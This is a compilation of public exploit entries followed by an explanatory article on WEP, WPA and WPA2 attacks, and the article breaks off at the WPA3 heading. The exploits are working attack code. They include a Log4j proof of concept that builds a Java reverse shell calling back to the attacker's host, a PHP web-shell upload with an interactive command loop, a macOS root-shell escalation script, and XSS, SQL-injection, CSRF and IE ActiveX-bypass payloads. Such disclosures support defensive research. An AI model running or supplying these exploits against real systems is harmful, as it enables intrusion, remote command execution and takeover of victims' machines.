print(f' i| response: {r.text}')
except Exception as e:
print(f' e| failed to make request: {e}')
finally:
server.shutdown()
server.server_close()
if __name__ == '__main__':
main()
# Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 29/11/2021
# Exploit Author: Mansi Singh
# Vendor Homepage: https://wordpress.org/plugins/typebot/
# Software Link: https://wordpress.org/plugins/typebot/
# Tested on Windows
# Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea
How to reproduce vulnerability:
1. Install Latest WordPress
2. Install and activate Typebot Version 1.4.3
3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'.
4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(1)>
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.
# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
# Date: 11/12/2021
# Exploit Authors: kozmer, z9fr, svmorris
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Software Link: https://github.com/apache/logging-log4j2
# Version: versions 2.0-beta-9 and 2.14.1.
# Tested on: Linux
# CVE: CVE-2021-44228
# Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess
import sys
import argparse
from colorama import Fore, init
import subprocess
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
init(autoreset=True)
def listToString(s):
str1 = ""
try:
for ele in s:
str1 += ele
return str1
except Exception as ex:
parser.print_help()
sys.exit()
def payload(userip , webport , lport):
genExploit = (
"""
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
public Exploit() throws Exception {
String host="%s";
int port=%s;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""") % (userip, lport)
# writing the exploit to Exploit.java file
try:
f = open("Exploit.java", "w")
f.write(genExploit)
f.close()
print(Fore.GREEN + '[+] Exploit java class created success')
except Exception as e:
print(Fore.RED + f'[-] Something went wrong {e.toString()}')
checkJavaAvailible()
print(Fore.GREEN + '[+] Setting up fake LDAP server\n')
# create the LDAP server on new thread
t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
t1.start()
# start the web server
httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
httpd.serve_forever()
def checkJavaAvailible():
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if(javaver != 0):
print(Fore.RED + '[-] Java is not installed inside the repository ')
sys.exit()
def createLdapServer(userip, lport):
sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
url = "
http://{}:{}/#Exploit".format
(userip, lport)
subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
"target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
def header():
print(Fore.BLUE+"""
[!] CVE: CVE-2021-44228
[!] Github repo:
https://github.com/kozmer/log4j-shell-poc
""")
if __name__ == "__main__":
header()
try:
parser = argparse.ArgumentParser(description='please enter the values ')
parser.add_argument('--userip', metavar='userip', type=str,
nargs='+', help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport', metavar='webport', type=str,
nargs='+', help='listener port for HTTP port')
parser.add_argument('--lport', metavar='lport', type=str,
nargs='+', help='Netcat Port')
args = parser.parse_args()
#print(args.userip)
payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
except KeyboardInterrupt:
print(Fore.RED + "user interupted the program.")
sys.exit(0)
# Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
# Exploit Author: leonjza
# Vendor Homepage: https://laravel.com/docs/8.x/valet
# Version: v1.1.4 to v2.0.3
#!/usr/bin/env python2
# Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS)
# February 2017 - @leonjza
# Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes.
# Reintroduced in v2.0.7 via the 'trust' command again.
# This bug got introduced when the sudoers files got added around
# commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1].
# Effectively, when the valet command is installed, composer will symlink [2]
# the `valet` command to /usr/local/bin. This 'command' is writable by the user
# that installed it.
#
# ~ $ ls -lah $(which valet)
# lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet
# Running `valet install`, will start the install [3] routine. The very first action
# taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which
# will prompt the user for the sudo password in the command line. From here (and in fact
# from any point where the valet tool uses sudo) the command can execute further commands
# as root without any further interaction needed by the user.
# With this 'sudo' access, the installer does it thing, and eventually installs two new
# sudoers rules for homebrew[5] and valet[6].
# ~ $ cat /etc/sudoers.d/*
# Cmnd_Alias BREW = /usr/local/bin/brew *
# %admin ALL=(root) NOPASSWD: BREW
# Cmnd_Alias VALET = /usr/local/bin/valet *
# %admin ALL=(root) NOPASSWD: VALET
# The problem with the sudoers rules now is the fact that a user controlled script
# (rememeber the valet command is writable to my user?) is allowed to be run with
# root privileges. More conveniently, without a password. So, to trivially privesc
# using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D
# Or, use this lame script you lazy sod.
#
# ~ $ sudo -k
# ~ $ python escalate.py
# * Shell written. Dropping into root shell
# bash-3.2# whoami
# root
# bash-3.2# exit
# exit
# * Cleaning up POC from valet command
# [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40
# [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39
# [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50
# [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133
# [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177
# [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46
import os
import subprocess
MIN_VERSION = "1.1.4"
MAX_VERSION = "2.0.3"
POC = "/bin/bash; exit;\n"
def run_shit_get_output(shit_to_run):
return subprocess.Popen(shit_to_run, shell=True,
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
def version_tuple(v):
return tuple(map(int, (v.split("."))))
def get_valet():
p = run_shit_get_output('which valet')
lines = ''.join(p.stdout.readlines())
if 'bin/valet' in lines:
return lines.strip()
return None
def get_valet_version(valet_location):
p = run_shit_get_output(valet_location)
v = p.stdout.read(25)
return v.split("\n")[0].split(" ")[2]
def can_write_to_valet(valet_location):
return os.access(valet_location, os.W_OK)
def cleanup_poc_from_command(command_location):
with open(command_location, 'r') as vc:
command_contents = vc.readlines()
if command_contents[1] == POC:
print('* Cleaning up POC from valet command')
command_contents.pop(1)
with open(command_location, 'w') as vc:
vc.write(''.join(command_contents))
return
print('* Could not cleanup the valet command. Check it out manually!')
return
def main():
valet_command = get_valet()
if not valet_command:
print(' * The valet command could not be found. Bailing!')
return
# get the content so we can check if we already pwnd it
with open(valet_command, 'r') as vc:
command_contents = vc.readlines()
# check that we havent already popped this thing
if command_contents[1] == POC:
print('* Looks like you already pwnd this. Dropping into shell anyways.')
os.system('sudo ' + valet_command)
cleanup_poc_from_command(valet_command)
return
current_version = get_valet_version(valet_command)
# ensure we have a valid, exploitable version
if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \
or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)):
print(' * Valet version {0} does not have this bug!'.format(current_version))
return
# check that we can write
if not can_write_to_valet(valet_command):
print('* Cant write to valet command at {0}. Bailing!'.format(valet_command))
return
# drop the poc line and write the new one
command_contents.insert(1, POC)
with open(valet_command, 'w') as vc:
vc.write(''.join(command_contents))
print('* Shell written. Dropping into root shell')
# drop in the root shell :D
os.system('sudo ' + valet_command)
cleanup_poc_from_command(valet_command)
if __name__ == '__main__':
main()
# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tester on: Kali 2021.2
# CVE: CVE-2019-9581
#!/usr/bin/python3
import sys
import requests
from random import randint
def login():
login_payload = {
"email": username,
"password": password,
"login": "submit",
#"language": "en_us"
}
login_req = request.post(
target+"/booked/Web/index.php",
login_payload,
verify=False,
allow_redirects=True
)
if login_req.status_code == 200:
print ("[+] Logged in successfully.")
else:
print ("[-] Wrong credentials !")
exit()
return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
def upload_shell(csrf):
boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))
_headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept-Language": "en-US,en;q=0.5",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
"Origin": target,
"Connection": "close",
"Referer": target + "/booked/Web/admin/manage_theme.php?update"
}
data = "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
data += "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
data += "Content-Type: application/x-php\r\n\n"
data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
data += "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
data += "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
data += csrf + "\r\n"
data += "-----------------------------"+boundary+"--\r\n"
# In case you need some debugging
_proxies = {
'http': 'http://127.0.0.1:8080'
}
upload_req = request.post(
target+"/booked/Web/admin/manage_theme.php?action=update",
headers = _headers,
data = data
#proxies=_proxies
)
def shell():
shell_req = request.get(target+"/booked/Web/custom-favicon.php")
if shell_req.status_code == 200:
print("[+] Uploaded shell successfully")
print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
else:
print("[-] Shell uploading failed")
exit(1)
print()
cmd = ''
while(cmd != 'exit'):
cmd = input("$ ")
shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
print(shell_req.text)
if len(sys.argv) != 4:
print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
exit()
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()
csrf = login()
upload_shell(csrf)
shell()
# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Date: 13/12/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.axesstmc.com/cloki/
<!--
Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control
Vendor: Zucchetti Axess S.p.A.
Product web page: https://www.axesstmc.com
Affected version: 1.64
1.63
1.54
Summary: CLOKI is the pre-installed application on our terminals that
provides simple to use access control management and attendance monitoring
using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone
looking for a stand-alone Access Control and Attendance Monitoring system
where the users' data is not frequently changed. Data management is simple
and intuitive and no additional software is needed on the PC intend to use
as WEB base. CLOKI for Access Control also allows configuration and monitoring
of access at all company entrances (doors, gates, turnstiles etc). The Access
Control manages any type of reader, entrance and access credential. Using an
impartial selector it is possible to check that employees do not take company
assets and allows registration of all accesses to the system and all operations
that users carry out.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. These
actions can be exploited to perform authentication detriment and account password
change with administrative privileges if a logged-in user visits a malicious web
site.
Tested on: Start X3 (h02 build 4163)
Start X1 (g01 build 2804)
X1/X2/X3/X4/X7 Web Server
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5689
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php
13.11.2021
-->
CSRF disable AC:
----------------
<html>
<body>
<form action="http://10.0.0.2:8081/redirect.cgi">
<input type="hidden" name="flagAccessControlChanged" value="true" />
<input type="hidden" name="RAct" value="5" />
<input type="hidden" name="EnR" value="1" />
<input type="hidden" name="ExR" value="1" />
<input type="hidden" name="DenyRTout" value="5" />
<input type="hidden" name="DenyR" value="0" />
<input type="hidden" name="IType" value="0" />
<input type="hidden" name="E485" value="on" />
<input type="hidden" name="GType" value="0" />
<input type="hidden" name="TOO" value="50" />
<input type="hidden" name="TOC" value="50" />
<input type="hidden" name="TOOE" value="100" />
<input type="hidden" name="TOCE" value="100" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF enable AC:
---------------
<html>
<body>
<form action="http://10.0.0.2:8081/redirect.cgi">
<input type="hidden" name="flagAccessControlChanged" value="true" />
<input type="hidden" name="ACtrl" value="on" />
<input type="hidden" name="RAct" value="5" />
<input type="hidden" name="EnR" value="1" />
<input type="hidden" name="ExR" value="1" />
<input type="hidden" name="DenyRTout" value="5" />
<input type="hidden" name="DenyR" value="0" />
<input type="hidden" name="IType" value="0" />
<input type="hidden" name="E485" value="on" />
<input type="hidden" name="GType" value="0" />
<input type="hidden" name="TOO" value="50" />
<input type="hidden" name="TOC" value="50" />
<input type="hidden" name="TOOE" value="100" />
<input type="hidden" name="TOCE" value="100" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
# Exploit Author: Yehia Elghaly (YME)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
# Version: Online Thesis Archiving System 1.0
# Tested on: Windows, xampp
# CVE: N/A
- Description:SQLi Authentication Bypass
SQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # - admin' or '1'='1
PoC:
POST /otas/admin/login.php HTTP/1.1
Host: 192.168.113.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.113.130
DNT: 1
Connection: close
Referer: http://192.168.113.130/otas/admin/login.php
Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
Upgrade-Insecure-Requests: 1
username=admin' #&password=admin' #
- Description: Stored Cross Site Scripting (XSS)
Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0.
Steps:
1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
2- Add new (curriculum) or (department)
3- Insert your payload <script>("xssyf")</script>
# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Internet Explorer (MSIE)
Internet Explorer is a discontinued series of graphical web browsers
developed by Microsoft and included in the Microsoft Windows line of
operating systems, starting in 1995.
[Vulnerability Type]
ActiveX Control Security Bypass
[CVE Reference]
N/A
[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer
ActiveX control warnings as well as popup blocker privacy settings are
not enforced.
This can allow the execution of ActiveX content with zero warning to
an unsuspecting end user and or force them to visit arbitrary attacker
controlled websites.
By default when opening browser associated files that contain active
content, MSIE restricts scripts from running without explicit user
interaction and permission.
Instead end users are presented with a yellow warning bar on the
browsers webpage, asking first if they wish to allow the running of
blocked content.
This prevents execution of active content scripts or controls without
the user first clicking the "Allow blocked content" warning bar.
However, specially crafted MHT files residing on disk that contain an
invalid header directive suppress ActiveX warnings and Popup blocker
privacy settings.
Therefore, to bypass Internet Explorer "active content" blocking,
files needs to contain an Content-Location header using an arbitrary
named value E.g.
"Content-Location: PBARBAR"
Note, often times MHT files are set to open in IE by default and IE
while discontinued it is still present on the Windows OS.
Tested successfully on Windows 10 latest fully patched version with
default IE security settings.
Expected result: ActiveX control security warning, prevention of code
execution and blocking browser popup windows.
Actual result: No ActiveX control code execution blocking, security
warnings or browser window popup blocking enforcement.
[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.
[Exploit/POC]
Change [VICTIM] value below to a specified user for testing.
1) Create the MHT PoC file.
"MSIE_ActiveX_Control_Security_Bypass.mht"
From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html";
boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"
This is a multi-part message in MIME format.
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv
________________________________________________________.hta', 'pop',
args)
pop.moveTo(2000,2000)
</script>
</body>
</html>
--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--
2) Create the PoC HTA file.
"Sales_Report_2021.csv
________________________________________________________.hta"
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no"
SYSMENU="no" CAPTION="no" />
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
</script>
3) Open the MHT file locally.
[Network Access]
Local
[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk
[Disclosure Timeline]
Vendor Notification: May 13, 2019
MSRC : July 2, 2019
"We determined that a fix for this issue will be considered in a
future version of this product or service.
At this time, we will not be providing ongoing updates of the status
of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
This article includes wireless security protocols including WEP, WPA, WPA2 and WPA3. For each of them, we will try to point out their advantages and disadvantages and describe some possible attacks.
WEP protocol
WEP was introduced as part of the original 802.11 standard approved in 1997 and it is probably the most commonly used WiFi security protocol. Its 10-bit or 26-bit hexadecimal digits (40-bit or 104-bit) key is very easy to identify. In 2004, both WEP-40 and WEP-104 were declared deprecated. There are 128-bit (the most common) and 256-bitWEP variants, but as computing power continues to improve, attackers are able to exploit many security vulnerabilities. In short, this protocol can no longer meet security needs.
It uses an RC4 password to ensure privacy and uses a CRC-32 checksum to ensure the integrity of the transmitted data. First, a key k is shared between network users (the protocol does not specify how to share) To send a message M, the integrity checksum of the message must be calculated and connected: there is now Mc(M). Mc(M) is then encrypted by exOR with the RC4 stream generated by k and a 24-bit common initialization vector (IV) named v. We record it as RC4 (v, k).
The result C=Mc(M) ⊕ RC4(v, k) is sent to the network, and users who know k can get the message through XORing C and RC4(v, k).
WEP uses RC4 stream cipher based on two algorithms:
The first is RC4-Key Scheduled Algorithm (KSA), which converts a key of length 1 to 256 bits into an initial arrangement S with numbers 0 to N. The internal state of RC4 consists of two numbers i and j, which are used as elements with pointer S.
The second algorithm is the RC4-pseudo-random generation algorithm (PRGA). It generates a single byte key stream from the current internal state of RC4 and then updates the internal state. Initially, N=255, but the algorithm can use different N values.
With CRC32, the original message is XORed with a 32-bit constant followed by as many 0 as possible to reach the length of the message. The result becomes a new "message" and the operation is repeated until the length of the result is lower than the length of the constant. It should be noted that this hash function is linear and bondless.
WEP Attack:
Packet Injection Fake Authentication FMS Attack KoreK Attack Chop Attack Fragment Attack PTW Attack (Pychkine, Tews, Weinmann)
Package Injection
This allows external personnel to generate a large amount of traffic on the network without having to be associated with it in any way. First, he must capture a specific type of packet. Although hidden behind encryption, packet type can be easily guessed based on packet size.
An ARP request package is always 28 bytes. By reinjecting it into the network, the AP will respond to this forgery request and send packets to the legitimate client. The extra traffic is used to collect encrypted packets faster, and the more packets the more likely he is to destroy WEP faster.
Fake authentication
Fake authentication attack allows an attacker to join a WEP-protected network, even if he does not know the root key. Clients can authenticate themselves in WEP-protected networks in two ways:
The first method is to open system authentication, with basically no protection.
The second method is called shared key authentication. This uses a secret root key and challenge-response authentication. The client requires an AP to connect, and the AP sends a frame containing a challenge (random byte string, plaintext), and the client answers using WEP encrypted frames. If there is no problem, the AP will reply successfully.
An attacker who sniffs out a handshake can join the network itself. Except for the AP challenge, all bytes in frame 3 are constant. The challenge is transmitted in plaintext in frame 2, so the attacker can recover the key stream (and IV) used to encrypt frame 3. With it, he can now initiate the authentication handshake and construct a valid frame (number 3).
FMS Attack
Released in 2001 by Fluhrrer, Mantin, and Shamir, it is based on the awareness of RC4 weaknesses with IVs (initialization vectors or random numbers, 3 bytes per packet key).
The attacker can manipulate RC4, allowing him to guess one byte (5% probability) of the key. If the key is wrong, the attacker will try again with the new key. To achieve a 50% success rate, an attacker needs to capture a large number of packets (up to 6 million).
If we know the first "l" bytes of each packet key, we can simulate RC4-KSA. Don't want the math here to go too deep, basically the next byte's key depends on (a bit related) the current byte and can be used to check if we are on the right track. Each iteration, we get one more byte of key and end up testing it. If it is wrong, the bytes of the key are switching with another possible value and restarting the process.
KoreK Attack
This is based on an FMS attack (first appeared in the netstumbler forum, 2004), but allows the attacker to find the key faster.
ChopChop Attack
Also found by "KoreK", it opposed exploiting the weakness of RC4, which attacks the WEP protocol itself (CRC32 checksum and lack of playback protection). It enables an attacker to decrypt packets without knowing the key.
Flip a bit in the ciphertext and then calculate which bit in the encrypted CRC32 value must be flipped so that the packet remains valid. The often mentioned method is to take out the last byte and try to guess its value.
Splitting Attack
If there is currently no client connected to the access point, a good attack can be run. Similar to the ChopChop attack, it speeds up the cracking process by injecting arbitrary packets into the AP. It will generate enough traffic to capture a large number of IVs, thereby improving the chances of cracking the keys (aircrack-ng). "aireplay-ng" and "packetforge-ng" are standard toolkits for such attacks.
PTW Attack
Pyshkin Tews Winmann (PTW) attack, released in 2007.
What makes PTW more powerful than all other attacks is that it can take advantage of every packet captured. Instead of trying all possible key combinations, it implements a key sorting strategy, selects a set of possible keys and continues with the RC4 algorithm based on these keys. Using different voting strategies, an attacker can select the most likely key byte in each decision in the tree to determine the correct key.
Tests show that a 50% chance of success is obtained by just 35,000 to 40,000 packets. Other sources point out that we can get a 95% chance in 85,000 frames.
WPA
WPA was launched in 2003 and is a direct response and replacement for the Wi-Fi Alliance to increasingly obvious vulnerabilities in the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The key used by WPA is a significant increase in keys 256-bit than used in WEP systems. 64-bit128-bit
Note: WPA-PSK basically means that the Wi-Fi network has a password shared by each Wi-Fi network client.
WPA includes message integrity checks (to determine if an attacker has captured/changed packets passed between the access point and the client) and Temporary Key Integrity Protocol (TKIP). TKIP uses a per-packet key system, which is more secure than the fixed key system used by WEP. The TKIP encryption standard was later replaced by the Advanced Encryption Standard (AES).
TKIP uses the same underlying mechanism as WEP and is therefore vulnerable to many similar attacks (such as Chop-Chop, MIC key recovery attacks).
Usually people do not directly attack the WPA protocol, but use the supplementary system ——Wi-Fi Protected Setup (WPS), which is launched by WPA.
Note: TKIP (Temporary Key Integrity Protocol) ——RC4 stream cipher is used with 128-bit per packet key, which means it dynamically generates a new key for each packet. Although still in use, it was considered obsolete after being replaced by CCMP in 2009.
WPA Attack:
Back and Tews Improved Attack on RC4, 2008, Inject Ohigashi-Morii Attack (Beck and Tews' + Man in the middle) Michael Attacks Dictionary Attack Handshake, Key Recovery
The attack "requires" to enable Quality of Service (QoS) (actually). This allows multiple channels to be used. Each channel has its own TSC (TKIP sequence counter). Channel 0 has most of the traffic, and the other channels have lower TSCs. The attack requires that the Key Renewal Interval be greater than 15 minutes (the time it takes to decrypt the ARP packet).
The attacker unauthenticates the site and then captures the ARP packet. Next, he will perform the modified ChopChop attack to recover the packet's ICV (integrity check value) and MIC. In this way, the attacker needs to guess the last part of the packet, i.e. the IP address. Finally, he inverts the MICHAEL algorithm and obtains the MIC key. With it, he can now inject custom packets into the network.
Countermeasure: Disable QoS.
Two types of keys used for data encryption:
Pairwise Transient Key (PTK) – Used to protect unicast data frames
Group Temporary Key (GTK) – Used to protect group addressed data frames (such as broadcasting ARP frames)
The attacker sends an ARP request (with his MAC and AP's IP address), so other clients update their ARP table. This way, all clients will send their packets to the attacker. The attacker will receive packets decrypted by the AP and reencrypt them with his own key. Everyone can build and broadcast fake packets using GTK. Messages sent with group keys are not protected against spoofing.
WPA2 protocol
Of course, WPA2 replaces WPA. Certification began in September 2004 and from March 13, 2006, all new devices must be trademarked with Wi-Fi. The most important upgrade is to force the use of the AES algorithm (rather than the previous RC4) and introduce CCMP (AES CCMP, counter cipher mode with block link message verification code protocol, 128 bits) as a replacement for TKIP (still present in WPA2) as a backup system and WPA interoperability).
As in previous versions, attacks on WPS are the most common attacks.
Note: WPA/WPA2 MGT (Administrative) means that the password is not a pre-encrypted key, but uses an authentication service, usually a RADIUS service that verifies the username/password of a Wi-Fi network client. MGT is most often associated with an enterprise/professional environment.
WPA2 Attack:
KRACK Attack PMKID Attack (PSK)WPS Attack Dictionary Attack
KRACK Attack
This attack targets four handshakes used to establish random numbers (a kind of "shared secret") in the WPA2 protocol. The WPA2 standard expects WiFi to be occasionally disconnected and allows reconnection with the same value during the third handshake (for fast reconnection and continuity). Since this standard does not require different keys to be used in this type of reconnection, which may be required at any time, replay attacks are possible.
Countermeasure: The access point has configuration options that can disable EAPOL-Key frame retransmission during key installation.
Useful: Key Reinstall Attack: Force Nonce Reuse in WPA2
PMKID Attack (PSK)
On August 4, 2018, a new exploit was released for Wi-Fi networks using WPA/WPA2-PSK (pre-shared key). The vulnerability allows an attacker to obtain a PSK for a specific SSID.
The attack was unexpectedly discovered while looking for new methods to attack the new WPA3 security standards.
The main difference compared to other attacks is that in this attack, there is no need to capture a complete EAPOL 4 handshake. The new attack is performed against RSN IEs of a single EAPOL frame.
Normal users are no longer needed because the attacker communicates directly with the AP (also known as a "clientless" attack).
You do not need to wait for 4 handshakes between the average user and the AP.
No more retransmission of EAPOL frames (which may lead to uncrackable results) and invalid passwords sent by ordinary users.
EAPOL frames are not lost when a normal user or AP is too far from an attacker.
Nonce and replay counter values are no longer required (causing slightly higher speeds).
There are no more special output formats (pcap, hccapx, etc.) —— final data will be displayed as a regular hexadecimal encoded string.
Source: https ://hashcat.net/forum/thread-7717.html Countermeasures: It is recommended to disable 802.11r on the WPA/WPA2-PSK network.
WPS Attack
WPS was launched in 2006, and the goal of the protocol is to allow Wi-Fi-protected access to home users who know very little about wireless security, and to easily add new devices to existing networks without entering a long password.
In December 2011, a vulnerability was discovered to affect a WPS-capable wireless router. The vulnerability allows remote attackers to recover WPS PIN within a few hours through brute force attacks and use WPS PIN to recover the network's WPA/WPA2 pre-shared key.
WPS enables clients to send 8-bit pins to the access point, which the access point verifies and then allows clients to connect. Pin contains only numbers, and there is a latency in WPS because the attacker needs to wait for the AP to respond. Therefore, an attacker can try several keys per second (or one key per few seconds).
We have 8 numbers and 10 numbers here, 10 8 (100.000.000). This is too much. The 8th bit is the checksum of the top 7 bits, so we have 10 7. Additionally, the password used for verification is divided into two halves, so we can verify the first 4 and last 4 digits independently. It is much easier to guess a 4-digit 2 at a time than an 8-digit 1. Finally, the math finally gets: 10 4 + 10 3=11,000 guesses.
While this strategy used to take hours, the newer WPS Pixie-Dust attacks could crack the network in seconds. Since 2011, many routers now have protections to detect and slow down (rate limit) or turn off Reaver type attacks (locking too many failed PIN attempts).
Routers have updated some settings to prevent WPS, but the way they implement encryption remains flawed. Creating true random numbers is relatively difficult, which is necessary to generate strong encryption. To achieve this, there is usually a function that takes a "seed" and produces a pseudo-random number.
If you use long or variable "seed" numbers, you can get the same results as actually random numbers, but if you use "seed" that is easy to guess, or worse, using the same "seed" time and time again, you end up with weak encryption that is easy to crack. That's what happens with those newer routers, what the WPS Pixie-Dust attacks exploit.
Countermeasure: Turn off WPS function.
Dictionary Attack
This relies on capturing the WPA handshake and then using a word list or brute force to crack the password. Depending on the password strength (length, character set), it can be difficult or impossible to crack it in a "reasonable" time.
Countermeasure: Use long passwords (12+) and different character sets (alphanumeric, special characters, uppercase/lowercase).
WPA3 protocol
